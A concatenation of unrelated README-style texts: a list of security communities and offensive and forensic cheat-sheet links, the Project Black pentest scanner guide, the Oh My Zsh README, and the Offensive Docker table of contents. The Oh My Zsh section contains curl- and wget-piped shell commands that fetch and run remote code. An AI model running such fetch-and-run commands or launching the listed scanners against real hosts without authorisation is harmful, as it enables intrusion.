* **DFIR Community** Security folks interested in Digital Forensics & Incident Response. https://rishi28.typeform.com/to/sTbTI8
* **Binary Ninja Slack** This is a channel dedicated to reverse engineering. Reverse engineering also called back engineering is the processes of extracting knowledge or design information from anything man-made and reproducing it or reproducing anything based on the extracted information the process often involves disassembling something a mechanical device electronic component computer program or biological chemical or organic matter and analysing its components and workings in detail. https://slackin-sbhuzyheck.now.sh/
* **Security HQ Slack** SecurityHQ is a channel most welcoming for all the security professionals and every newbie who wanted to build a career on Information Security or Cyber Security is most welcome to this channel. https://securityhq.herokuapp.com/
* **CentralSec Slack** This is a community of people who are into everything in information security. https://launchpass.com/centralsec
* **Penetration Testers Slack** This is a group of ethical hackers and you’re most welcome to this channel if you wanted to start pentesting and find the vulnerabilities and exploits on any website or app and get more help from the fellow members of the channel. https://pentestpractice.slack.com/
### (Virtual) Meetups
* **Cybersecurity Mentoring Hub** Global session conducted over webex with a discussion/presentation on cybersecurity topic from within the community. Regular shoutouts on LinkedIn. https://cybersecmentorship.org/
* **MeetCyber** Regular sessions conducted over crowdcast, can be a training or a workshop, excellent networking and learning opportunities. https://meetcyber.net/
## References/Tools/Cheat Sheets
**Malware Analysis**
* VirusTotal - Analyze suspicious files and URLs to detect types of malware, automatically share them with the security community https://www.virustotal.com/gui/
* Any.Run Malware hunting with live access to the heart of an incident https://any.run/
**Cheatsheets**
* Privilege-Escalation: This cheasheet is aimed at the CTF Players and Beginners to help them understand the fundamentals of Privilege Escalation with examples.
https://github.com/Ignitetechnologies/Privilege-Escalation
* Malware analysis tools and resources.
https://github.com/rshipp/awesome-malware-analysis
* Analyzing Malicious Documents Cheat Sheet
https://zeltser.com/analyzing-malicious-documents/
* ReverseEngineering Cheat Sheet
https://www.cybrary.it/wp-content/uploads/2017/11/cheat-sheet-reverse-v6.png
* SQL Injection | Various DBs
http://pentestmonkey.net/category/cheat-sheet/sql-injection
* Nmap Cheat Sheet and Pro Tips
https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/
* PENTESTING LocalFileInclude Cheat Sheet
https://highon.coffee/blog/lfi-cheat-sheet/
* Penetration Testing Tools Cheat Sheet
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
* Reverse Shell Cheat Sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/
* nbtscan Cheat Sheet
https://highon.coffee/blog/nbtscan-cheat-sheet/
* Linux Commands Cheat Sheet
https://highon.coffee/blog/linux-commands-cheat-sheet/
* Kali Linux Cheat Sheet
https://i.redd.it/9bu827i9tr751.jpg
* Hacking Tools Cheat Sheet (Diff tools)
https://i.redd.it/fviaw8s43q851.jpg
* Google Search Operators: The Complete List (42 Advanced Operators)
https://ahrefs.com/blog/google-advanced-search-operators/
* (Multiple) (Good) Cheat Sheets - Imgur
https://imgur.com/gallery/U5jqgik
* Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
* Shodan Query Filters
https://github.com/JavierOlmedo/shodan-filters
* Getting Real with XSS - A reference on the new technquies to XSS
https://labs.f-secure.com/blog/getting-real-with-xss/
**SANS Massive List of Cheat Sheets** Curated from here: https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/
**_General IT Security_**
* Windows and Linux Terminals & Command Lines https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/bltea7de5267932e94b/5eb08aafcf88d36e47cf0644/Cheatsheet_SEC301-401_R7.pdf
* TCP/IP and tcpdump
https://www.sans.org/security-resources/tcpip.pdf?msc=Cheat+Sheet+Blog
* IPv6 Pocket Guide
https://www.sans.org/security-resources/ipv6_tcpip_pocketguide.pdf?msc=Cheat+Sheet+Blog
* Powershell Cheat Sheet
https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/bltf146e4f361db3938/5e34a7bc946d717e2eab6139/power-shell-cheat-sheet-v41.pdf
* Writing Tips for IT Professionals
https://zeltser.com/writing-tips-for-it-professionals/
* Tips for Creating and Managing New IT Products
https://zeltser.com/new-product-management-tips/
* Tips for Getting the Right IT Job
https://zeltser.com/getting-the-right-it-job-tips/
* Tips for Creating a Strong Cybersecurity Assessment Report
https://zeltser.com/security-assessment-report-cheat-sheet/
* Critical Log Review Checklist for Security Incidents
https://zeltser.com/security-incident-log-review-checklist/
* Security Architecture Cheat Sheet for Internet Applications
https://zeltser.com/security-architecture-cheat-sheet/
* Tips for Troubleshooting Human Communications
https://zeltser.com/human-communications-cheat-sheet/
* Security Incident Survey Cheat Sheet for Server Administrators
https://zeltser.com/security-incident-survey-cheat-sheet/
* Network DDoS Incident Response Cheat Sheet
https://zeltser.com/ddos-incident-cheat-sheet/
* Information Security Assessment RFP Cheat Sheet
https://zeltser.com/cheat-sheets/
**_Digital Forensics and Incident Response_**
* SIFT Workstation Cheat Sheet
https://digital-forensics.sans.org/media/sift_cheat_sheet.pdf?msc=Cheat+Sheet+Blog
* Plaso Filtering Cheat Sheet
https://digital-forensics.sans.org/media/Plaso-Cheat-Sheet.pdf?msc=Cheat+Sheet+Blog
* Tips for Reverse-Engineering Malicious Code
https://digital-forensics.sans.org/media/reverse-engineering-malicious-code-tips.pdf?msc=Cheat+Sheet+Blog
* REMnux Usage Tips for Malware Analysis on Linux
https://digital-forensics.sans.org/media/remnux-malware-analysis-tips.pdf?msc=Cheat+Sheet+Blog
* Analyzing Malicious Documents
https://digital-forensics.sans.org/media/analyzing-malicious-document-files.pdf?msc=Cheat+Sheet+Blog
* Malware Analysis and Reverse-Engineering Cheat Sheet
https://digital-forensics.sans.org/media/malware-analysis-cheat-sheet.pdf?msc=Cheat+Sheet+Blog
* SQlite Pocket Reference Guide
https://digital-forensics.sans.org/media/SQlite-PocketReference-final.pdf?msc=Cheat+Sheet+Blog
* Eric Zimmerman's tools Cheat Sheet
https://digital-forensics.sans.org/media/EricZimmermanCommandLineToolsCheatSheet-v1.0.pdf?msc=Cheat+Sheet+Blog
* Rekall Memory Forensics Cheat Sheet
https://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf?msc=Cheat+Sheet+Blog
* Linux Shell Survival Guide
https://digital-forensics.sans.org/media/linux-shell-survival-guide.pdf?msc=Cheat+Sheet+Blog
* Windows to Unix Cheat Sheet
https://digital-forensics.sans.org/media/windows_to_unix_cheatsheet.pdf?msc=Cheat+Sheet+Blog
* Memory Forensics Cheat Sheet
https://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf?msc=Cheat+Sheet+Blog
* Hex and Regex Forensics Cheat Sheet
https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf?msc=Cheat+Sheet+Blog
* FOR518 Mac & iOS HFS+ Filesystem Reference Sheet
https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt61c336e02577e733/5eb0940e248a28605479ccf0/FOR518_APFS_CheatSheet_012020.pdf
* The majority of DFIR Cheat Sheets can be found here --> https://digital-forensics.sans.org/community/cheat-sheets?msc=Cheat+Sheet+Blog.
**_Penetration Testing_**
* Swiss Army Knife collection of PenTesting Cheatsheets
https://github.com/swisskyrepo/PayloadsAllTheThings
* SQLite Injection Cheat Sheet
https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet
* SSL/TLS Vulnerability Cheat Sheet
https://github.com/IBM/tls-vuln-cheatsheet
* Windows Intrusion Discovery Cheat Sheet v3.0
https://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf?msc=Cheat+Sheet+Blog
* Intrusion Discovery Cheat Sheet v2.0 (Linux)
https://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf?msc=Cheat+Sheet+Blog
* Intrusion Discovery Cheat Sheet v2.0 (Windows 2000)
https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/bltd6fa777a3215f34a/5eb08aae08d37e6d82ef77fe/win2ksacheatsheet.pdf
* Windows Command Line
https://pen-testing.sans.org/retrieve/windows-command-line-sheet.pdf?msc=Cheat+Sheet+Blog
* Netcat Cheat Sheet
https://pen-testing.sans.org/retrieve/netcat-cheat-sheet.pdf?msc=Cheat+Sheet+Blog
* Misc Tools Cheat Sheet
https://pen-testing.sans.org/retrieve/misc-tools-sheet.pdf?msc=Cheat+Sheet+Blog
* Python 3 Essentials
https://www.sans.org/blog/sans-cheat-sheet-python-3/?msc=Cheat+Sheet+Blog
* Windows Command Line Cheat Sheet
https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt4e45e00c2973546d/5eb08aae4461f75d77a48fd4/WindowsCommandLineSheetV1.pdf
* SMB Access from Linux Cheat Sheet
https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blta6a2ae64ec0ed535/5eb08aaeead3926127b4df44/SMB-Access-from-Linux.pdf
* Pivot Cheat Sheet
https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt0f228a4b9a1165e4/5ef3d602395b554cb3523e7b/pivot-cheat-sheet-v1.0.pdf
* Google Hacking and Defense Cheat Sheet
https://www.sans.org/security-resources/GoogleCheatSheet.pdf?msc=Cheat+Sheet+Blog
* Scapy Cheat Sheet
https://wiki.sans.blue/Tools/pdfs/ScapyCheatSheet_v0.2.pdf
* Nmap Cheat Sheet
https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blte37ba962036d487b/5eb08aae26a7212f2db1c1da/NmapCheatSheetv1.1.pdf
**_Cloud Security_**
* Multicloud Cheat Sheet
https://www.sans.org/security-resources/posters/cloud/multicloud-cheat-sheet-215?msc=blog-ultimate-list-cheat-sheets
**_All Around Defender Primers_**
* Linux CLI 101
https://wiki.sans.blue/Tools/pdfs/LinuxCLI101.pdf
* Linux CLI
https://wiki.sans.blue/Tools/pdfs/LinuxCLI.pdf
* PowerShell Primer
https://wiki.sans.blue/Tools/pdfs/PowerShell.pdf
* PowerShell Get-WinEvent
https://wiki.sans.blue/Tools/pdfs/Get-WinEvent.pdf
**Offensive**
* Exploit Database - The Exploit Database is maintained by Offensive Security, an information security training company that provides various Information Security Certifications as well as high end penetration testing services. https://www.exploit-db.com/
|
# Project Black
Scope control, scope scanner and progress tracker for easier working on a bug bounty or pentest project
Anatoly Ivanov of [Positive Technologies](https://ptsecurity.com)
## What is this tool for?
The tools encourages more **methodical** work on pentest/bugbounty, tracking the progress and general scans information.
It can launch
* masscan
* nmap
* dirsearch
* amass
* patator
against the scope you work on and store the data in a handy form. Perform useful filtering of the project's data, for instance:
* find me all hosts, which have open ports, but not 80
* find me all hosts, whose ips start with 82.
* find me hosts where dirsearch has found at least 1 file with 200 status code
## Installation
Basic setup via docker-compose will run on any system which has docker and docker-compose dependency
If you don't have docker installed then
### Docker for Ubuntu/Debian
```
sudo apt install docker.io
```
### Tool installation
If you have docker set up, then for Ubuntu/Debian simply
```
sudo curl -L "https://github.com/docker/compose/releases/download/1.23.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
git clone https://github.com/c0rvax/project-black
cd project-black
sudo docker-compose up
```
If you see some SQL errors, try stopping docker-compose (Ctrl + C **once** and wait for nice shutdown) and run `docker-compose up`
This might take some time but that's it! Other distros should have very similar guidance.
Now head to http://localhost:5000, enter the credentials. They can be found in https://github.com/c0rvax/project-black/blob/master/config/config_docker.yml under `application`
For a more complex setup or something failed, see the [wiki](https://github.com/c0rvax/project-black/wiki/Set-up).
### Resources notice
None of the docker containers restrict the amount of resources usage, you are on your own here, however, you can change the amount of parallel tasks for each worker separately. See the wiki for [that](https://github.com/c0rvax/project-black/wiki/Tuning#parallel-tasks-inside-worker)
## How to work?
After a setup, create a project and head to the respective page.
![Open project](https://i.imgur.com/pQT19Yt.png)
Now we will follow the basic steps which you can do within the application
### Add scope
Let's say we are assessing hackerone.com and all it's subdomains. Write `hackerone.com` into the `add scope` field and press `Add to scope`
![Scope add](https://i.imgur.com/uZrsBi2.png)
Entrypoint has been added.
There are other ways to add scope, see [wiki](https://github.com/c0rvax/project-black/wiki/Scope)
### Quick note on working
All of the tasks can read parameters from the user, however, lauching with some options won't diplay any new result as it is pretty difficult to parse all possible outputs of a program. So to start, try working duplicating the options from this manual.
Available options can be found on this [page](https://github.com/c0rvax/project-black/wiki/Supported-options)
### Start amass
Click the blue button `Launch task`.
![Launch task](https://i.imgur.com/jX2cP4K.png)
A popup with parameters will appear.
![amass options](https://i.imgur.com/f25OKVf.png)
It is recommended to click the `All_top_level_domains` check box and in argv enter `-ip` and click `Fire!` button.
![amass recommended](https://i.imgur.com/UaGkqmu.png)
This would launch `amass -d hackerone.com -ip`. Note that in this case we did not specify any domain. This is beacause the `All_top_level_domains` check box means looking into the scope which is stored in the database. So the program sees that `hackerone.com` was added to the scope and launches `amass` against it.
Upon finishing, the new data is automatically added to scope.
### Start masscan and nmap
Now head to `IPs` tab. Click the already known button `Launch task` and choose `masscan`.
We will launch a quick scan, using the button `Top N ports`. This autocompletes the `argv` parameter. Press `Fire!`
![Masscan launch](https://i.imgur.com/eveBuU5.png)
Results are automatically downloaded from the database.
![Masscan results](https://i.imgur.com/unDdXPB.png)
Now click `Launch task` and choose `nmap only open`. This will find all the open ports which exist in the database and run nmap only against them.
Click `Banner` and `Fire`.
![nmap only open start](https://i.imgur.com/9NmQsVQ.png)
Detected banner will automatically appear
![nmap banners](https://i.imgur.com/TEXmp9u.png)
### Launching dirsearch
Launch dirsearch against all ips and all open ports (both HTTP and HTTPS would be tried)
On `IPs` tab click `Launch task` and select `dirsearch`. Fill in extenstions you want to try and click `Fire!`
You can launch dirseach agains hosts (not ips) on the `Hosts` tab.
#### Note on dirsearch
If there are no ports, dirsearch won't even start. So first, make sure you launched nmap or masscan to discover open ports.
## Inspecting results
There are generally three ways to check the results:
* IPs/Hosts list
* IP/Host details
* Dirsearch list
### IPs and Hosts list
Those are two tabs. They work the same way so we will stop on Hosts.
![Hosts list](https://i.imgur.com/HQefnhu.png)
You can see a list of hosts, their ports and files. Also you can edit a comment for that host.
Important part here is **filtering** box.
![Filtering](https://i.imgur.com/4sxDYlX.png)
You can aggregate different filters using the field shown above. Type the filter you want (there is a helper for that) and press **Shift + Enter**
![Applied filters](https://i.imgur.com/ZdRsSjp.png)
### IP/Host details
You can also view details on a specific host or ip. Press button with the glasses
![Spectacles](https://i.imgur.com/XJCcFJl.png)
There you will see dirsearch result for every open port on that host
### Dirsearch list
`Dirsearch list` button will open a new window showing all found files for every dirsearch which was launched in this project.
## Launching tasks against specific scope
IPs and Hosts `Launch task` are different! The button on IPs page will start against all ips within the current project, meanwhile the button on the Hosts page will launch against hosts.
To launch a task against some hosts, you should
1. Filter the hosts
2. Launch the task
Example:
![Applied filters 2](https://i.imgur.com/ZdRsSjp.png)
Some filters have been applied. If we now launch dirsearch, it will be launched against hosts which correspond to the used filters.
|
<p align="center">
<img src="https://s3.amazonaws.com/ohmyzsh/oh-my-zsh-logo.png" alt="Oh My Zsh">
</p>
Oh My Zsh is an open source, community-driven framework for managing your [zsh](https://www.zsh.org/) configuration.
Sounds boring. Let's try again.
__Oh My Zsh will not make you a 10x developer...but you may feel like one.__
Once installed, your terminal shell will become the talk of the town _or your money back!_ With each keystroke in your command prompt, you'll take advantage of the hundreds of powerful plugins and beautiful themes. Strangers will come up to you in cafés and ask you, _"that is amazing! are you some sort of genius?"_
Finally, you'll begin to get the sort of attention that you have always felt you deserved. ...or maybe you'll use the time that you're saving to start flossing more often. 😬
To learn more, visit [ohmyz.sh](https://ohmyz.sh), follow [@ohmyzsh](https://twitter.com/ohmyzsh) on Twitter, and/or join us on [Discord](https://discord.gg/ohmyzsh).
[![CI](https://github.com/ohmyzsh/ohmyzsh/workflows/CI/badge.svg)](https://github.com/ohmyzsh/ohmyzsh/actions?query=workflow%3ACI)
[![Follow @ohmyzsh](https://img.shields.io/twitter/follow/ohmyzsh?label=Follow+@ohmyzsh&style=flat)](https://twitter.com/intent/follow?screen_name=ohmyzsh)
[![Discord server](https://img.shields.io/discord/642496866407284746)](https://discord.gg/ohmyzsh)
## Getting Started
### Prerequisites
* A Unix-like operating system: macOS, Linux, BSD. On Windows: WSL2 is preferred, but cygwin or msys also mostly work.
* [Zsh](https://www.zsh.org) should be installed (v4.3.9 or more recent is fine but we prefer 5.0.8 and newer). If not pre-installed (run `zsh --version` to confirm), check the following wiki instructions here: [Installing ZSH](https://github.com/ohmyzsh/ohmyzsh/wiki/Installing-ZSH)
* `curl` or `wget` should be installed
* `git` should be installed (recommended v2.4.11 or higher)
### Basic Installation
Oh My Zsh is installed by running one of the following commands in your terminal. You can install this via the command-line with either `curl` or `wget`, whichever is installed on your machine.
#### via curl
```shell
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
```
#### via wget
```shell
sh -c "$(wget -O- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
```
#### via fetch
```shell
sh -c "$(fetch -o - https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
```
#### Manual inspection
It's a good idea to inspect the install script from projects you don't yet know. You can do
that by downloading the install script first, looking through it so everything looks normal,
then running it:
```shell
curl -Lo install.sh https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh
sh install.sh
```
## Using Oh My Zsh
### Plugins
Oh My Zsh comes with a shitload of plugins for you to take advantage of. You can take a look in the [plugins](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins) directory and/or the [wiki](https://github.com/ohmyzsh/ohmyzsh/wiki/Plugins) to see what's currently available.
#### Enabling Plugins
Once you spot a plugin (or several) that you'd like to use with Oh My Zsh, you'll need to enable them in the `.zshrc` file. You'll find the zshrc file in your `$HOME` directory. Open it with your favorite text editor and you'll see a spot to list all the plugins you want to load.
```shell
vi ~/.zshrc
```
For example, this might begin to look like this:
```shell
plugins=(
git
bundler
dotenv
osx
rake
rbenv
ruby
)
```
_Note that the plugins are separated by whitespace (spaces, tabs, new lines...). **Do not** use commas between them or it will break._
#### Using Plugins
Each plugin includes a __README__, documenting it. This README should show the aliases (if the plugin adds any) and extra goodies that are included in that particular plugin.
### Themes
We'll admit it. Early in the Oh My Zsh world, we may have gotten a bit too theme happy. We have over one hundred and fifty themes now bundled. Most of them have [screenshots](https://github.com/ohmyzsh/ohmyzsh/wiki/Themes) on the wiki (We are working on updating this!). Check them out!
#### Selecting a Theme
_Robby's theme is the default one. It's not the fanciest one. It's not the simplest one. It's just the right one (for him)._
Once you find a theme that you'd like to use, you will need to edit the `~/.zshrc` file. You'll see an environment variable (all caps) in there that looks like:
```shell
ZSH_THEME="robbyrussell"
```
To use a different theme, simply change the value to match the name of your desired theme. For example:
```shell
ZSH_THEME="agnoster" # (this is one of the fancy ones)
# see https://github.com/ohmyzsh/ohmyzsh/wiki/Themes#agnoster
```
_Note: many themes require installing the [Powerline Fonts](https://github.com/powerline/fonts) in order to render properly._
Open up a new terminal window and your prompt should look something like this:
![Agnoster theme](https://cloud.githubusercontent.com/assets/2618447/6316862/70f58fb6-ba03-11e4-82c9-c083bf9a6574.png)
In case you did not find a suitable theme for your needs, please have a look at the wiki for [more of them](https://github.com/ohmyzsh/ohmyzsh/wiki/External-themes).
If you're feeling feisty, you can let the computer select one randomly for you each time you open a new terminal window.
```shell
ZSH_THEME="random" # (...please let it be pie... please be some pie..)
```
And if you want to pick random theme from a list of your favorite themes:
```shell
ZSH_THEME_RANDOM_CANDIDATES=(
"robbyrussell"
"agnoster"
)
```
If you only know which themes you don't like, you can add them similarly to an ignored list:
```shell
ZSH_THEME_RANDOM_IGNORED=(pygmalion tjkirch_mod)
```
### FAQ
If you have some more questions or issues, you might find a solution in our [FAQ](https://github.com/ohmyzsh/ohmyzsh/wiki/FAQ).
## Advanced Topics
If you're the type that likes to get their hands dirty, these sections might resonate.
### Advanced Installation
Some users may want to manually install Oh My Zsh, or change the default path or other settings that
the installer accepts (these settings are also documented at the top of the install script).
#### Custom Directory
The default location is `~/.oh-my-zsh` (hidden in your home directory, you can access it with `cd ~/.oh-my-zsh`)
If you'd like to change the install directory with the `ZSH` environment variable, either by running
`export ZSH=/your/path` before installing, or by setting it before the end of the install pipeline
like this:
```shell
ZSH="$HOME/.dotfiles/oh-my-zsh" sh install.sh
```
#### Unattended install
If you're running the Oh My Zsh install script as part of an automated install, you can pass the
flag `--unattended` to the `install.sh` script. This will have the effect of not trying to change
the default shell, and also won't run `zsh` when the installation has finished.
```shell
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" "" --unattended
```
#### Installing from a forked repository
The install script also accepts these variables to allow installation of a different repository:
- `REPO` (default: `ohmyzsh/ohmyzsh`): this takes the form of `owner/repository`. If you set
this variable, the installer will look for a repository at `https://github.com/{owner}/{repository}`.
- `REMOTE` (default: `https://github.com/${REPO}.git`): this is the full URL of the git repository
clone. You can use this setting if you want to install from a fork that is not on GitHub (GitLab,
Bitbucket...) or if you want to clone with SSH instead of HTTPS (`[email protected]:user/project.git`).
_NOTE: it's incompatible with setting the `REPO` variable. This setting will take precedence._
- `BRANCH` (default: `master`): you can use this setting if you want to change the default branch to be
checked out when cloning the repository. This might be useful for testing a Pull Request, or if you
want to use a branch other than `master`.
For example:
```shell
REPO=apjanke/oh-my-zsh BRANCH=edge sh install.sh
```
#### Manual Installation
##### 1. Clone the repository:
```shell
git clone https://github.com/ohmyzsh/ohmyzsh.git ~/.oh-my-zsh
```
##### 2. *Optionally*, backup your existing `~/.zshrc` file:
```shell
cp ~/.zshrc ~/.zshrc.orig
```
##### 3. Create a new zsh configuration file
You can create a new zsh config file by copying the template that we have included for you.
```shell
cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc
```
##### 4. Change your default shell
```shell
chsh -s $(which zsh)
```
You must log out from your user session and log back in to see this change.
##### 5. Initialize your new zsh configuration
Once you open up a new terminal window, it should load zsh with Oh My Zsh's configuration.
### Installation Problems
If you have any hiccups installing, here are a few common fixes.
* You _might_ need to modify your `PATH` in `~/.zshrc` if you're not able to find some commands after
switching to `oh-my-zsh`.
* If you installed manually or changed the install location, check the `ZSH` environment variable in
`~/.zshrc`.
### Custom Plugins and Themes
If you want to override any of the default behaviors, just add a new file (ending in `.zsh`) in the `custom/` directory.
If you have many functions that go well together, you can put them as a `XYZ.plugin.zsh` file in the `custom/plugins/` directory and then enable this plugin.
If you would like to override the functionality of a plugin distributed with Oh My Zsh, create a plugin of the same name in the `custom/plugins/` directory and it will be loaded instead of the one in `plugins/`.
## Getting Updates
By default, you will be prompted to check for upgrades every few weeks. If you would like `oh-my-zsh` to automatically upgrade itself without prompting you, set the following in your `~/.zshrc`:
```shell
DISABLE_UPDATE_PROMPT=true
```
To disable automatic upgrades, set the following in your `~/.zshrc`:
```shell
DISABLE_AUTO_UPDATE=true
```
### Manual Updates
If you'd like to upgrade at any point in time (maybe someone just released a new plugin and you don't want to wait a week?) you just need to run:
```shell
omz update
```
Magic! 🎉
## Uninstalling Oh My Zsh
Oh My Zsh isn't for everyone. We'll miss you, but we want to make this an easy breakup.
If you want to uninstall `oh-my-zsh`, just run `uninstall_oh_my_zsh` from the command-line. It will remove itself and revert your previous `bash` or `zsh` configuration.
## How do I contribute to Oh My Zsh?
Before you participate in our delightful community, please read the [code of conduct](CODE_OF_CONDUCT.md).
I'm far from being a [Zsh](https://www.zsh.org/) expert and suspect there are many ways to improve – if you have ideas on how to make the configuration easier to maintain (and faster), don't hesitate to fork and send pull requests!
We also need people to test out pull-requests. So take a look through [the open issues](https://github.com/ohmyzsh/ohmyzsh/issues) and help where you can.
See [Contributing](CONTRIBUTING.md) for more details.
### Do NOT send us themes
We have (more than) enough themes for the time being. Please add your theme to the [external themes](https://github.com/ohmyzsh/ohmyzsh/wiki/External-themes) wiki page.
## Contributors
Oh My Zsh has a vibrant community of happy users and delightful contributors. Without all the time and help from our contributors, it wouldn't be so awesome.
Thank you so much!
## Follow Us
We're on the social media.
* [@ohmyzsh](https://twitter.com/ohmyzsh) on Twitter. You should follow it.
* [FaceBook](https://www.facebook.com/Oh-My-Zsh-296616263819290/) poke us.
* [Instagram](https://www.instagram.com/_ohmyzsh/) tag us in your post showing Oh My Zsh!
* [Discord](https://discord.gg/ohmyzsh) to chat with us!
## Merchandise
We have [stickers, shirts, and coffee mugs available](https://shop.planetargon.com/collections/oh-my-zsh?utm_source=github) for you to show off your love of Oh My Zsh. Again, you will become the talk of the town!
## License
Oh My Zsh is released under the [MIT license](LICENSE.txt).
## About Planet Argon
![Planet Argon](https://pa-github-assets.s3.amazonaws.com/PARGON_logo_digital_COL-small.jpg)
Oh My Zsh was started by the team at [Planet Argon](https://www.planetargon.com/?utm_source=github), a [Ruby on Rails development agency](https://www.planetargon.com/skills/ruby-on-rails-development?utm_source=github). Check out our [other open source projects](https://www.planetargon.com/open-source?utm_source=github).
|
<!-- markdownlint-disable MD033 MD041 -->
<p align="center">
<a href="https://hub.docker.com/r/aaaguirrep/offensive-docker">
<img
alt="Offensive Docker"
src="https://github.com/aaaguirrep/offensive-docker/blob/master/img/banner.jpg"
width="600"
/>
</a>
</p>
<br/>
<p align="center">
<a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub code size in bytes" src="https://img.shields.io/github/languages/code-size/aaaguirrep/offensive-docker"></a>
<a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub repo size" src="https://img.shields.io/github/repo-size/aaaguirrep/offensive-docker"></a>
<a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/aaaguirrep/offensive-docker"></a>
<a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub issues" src="https://img.shields.io/github/issues/aaaguirrep/offensive-docker"></a>
<a href="https://github.com/aaaguirrep/offensive-docker/graphs/contributors"><img alt="GitHub contributors" src="https://img.shields.io/github/contributors/aaaguirrep/offensive-docker">
<a href="https://github.com/aaaguirrep/offensive-docker/blob/master/LICENSE"><img alt="GitHub" src="https://img.shields.io/github/license/aaaguirrep/offensive-docker"></a>
</p>
<p align="center">
<a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/aaaguirrep/offensive-docker"></a>
<a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Automated build" src="https://img.shields.io/docker/automated/aaaguirrep/offensive-docker"></a>
<a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Pulls" src="https://img.shields.io/docker/pulls/aaaguirrep/offensive-docker"></a>
<a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Image Size (latest by date)" src="https://img.shields.io/docker/image-size/aaaguirrep/offensive-docker"></a>
<a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Image Version (latest by date)" src="https://img.shields.io/docker/v/aaaguirrep/offensive-docker"></a>
<a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Stars" src="https://img.shields.io/docker/stars/aaaguirrep/offensive-docker"></a>
</p>
<p align="center">
<a href="https://discord.gg/2uBfu8E"><img alt="Discord" src="https://img.shields.io/discord/749093790676942888"></a>
</p>
Offensive Docker is an image with the more used tools to create an pentest environment easily and quickly.
:arrow_right: **Note:** Check out the next repo to know how to launch offensive docker in a VPS in Google Cloud Platform or Digital Ocean (free credit included). [Offensive Docker VPS](https://github.com/aaaguirrep/offensive-docker-vps)
### Table of Contents
- [Links](#links)
- [Features](#features)
- [Requirements](#requirements)
- [Tools installed](#tools-installed)
- [Operative system tools](#operative-system-tools)
- [Network tools](#network-tools)
- [Developer tools](#developer-tools)
- [:hocho: Offensive tools](#hocho-offensive-tools)
- [Port scanning](#port-scanning)
- [:mag: Recon](#mag-recon)
- [Subdomains](#subdomains)
- [Subdomain takeover](#subdomain-takeover)
- [DNS Lookups](#dns-lookups)
- [:camera: Screenshot](#camera-screenshot)
- [:spider_web: Crawler](#spider_web-crawler)
- [:file_folder: Search directories](#file_folder-search-directories)
- [Fuzzer](#fuzzer)
- [Web Scanning](#web-scanning)
- [CMS](#cms)
- [Search JS](#search-js)
- [Wordlist](#wordlist)
- [Git repositories](#git-repositories)
- [OWASP](#owasp)
- [:iphone: Mobile](#iphone-mobile)
- [Brute force](#brute-force)
- [Cracking](#cracking)
- [OS Enumeration](#os-enumeration)
- [Exploits](#exploits)
- [Windows](#windows)
- [Reverse shell](#reverse-shell)
- [Other resources](#other-resources)
- [Custom functions](#custom-functions)
- [Other services](#other-services)
- [:memo: Documentation](#memo-documentation)
- [:hammer_and_wrench: Usage](#hammer_and_wrench-usage)
- [Option 1 - Use the github repository](#option-1---use-the-github-repository)
- [Option 2 - Use the image from docker hub](#option-2---use-the-image-from-docker-hub)
- [Considerations to run the container](#considerations-to-run-the-container)
- [:gear: Nice configurations](#gear-nice-configurations)
- [1. Configure credentials in the docker](#1-configure-credentials-in-the-docker)
- [2. Alias to connect to HTB (Hack the Box) VPN](#2-alias-to-connect-to-htb-hack-the-box-vpn)
- [Option 1 - HTB VPN using github repository](#option-1---htb-vpn-using-github-repository)
- [Option 2 - HTB VPN using docker hub image](#option-2---htb-vpn-using-docker-hub-image)
- [3. Save and load command history in your local environment](#3-save-and-load-command-history-in-your-local-environment)
- [Option 1 - Command history using github repository](#option-1---command-history-using-github-repository)
- [Option 2 - Command history using docker hub image](#option-2---command-history-using-docker-hub-image)
- [:white_check_mark: Environment tested](#white_check_mark-environment-tested)
- [:warning: Warning](#warning-warning)
- [:coffee: Donations](#coffee-donations)
- [Contributors](#contributors)
- [Contributing](#contributing)
- [:chart_with_upwards_trend: Stargazers over time](#chart_with_upwards_trend-stargazers-over-time)
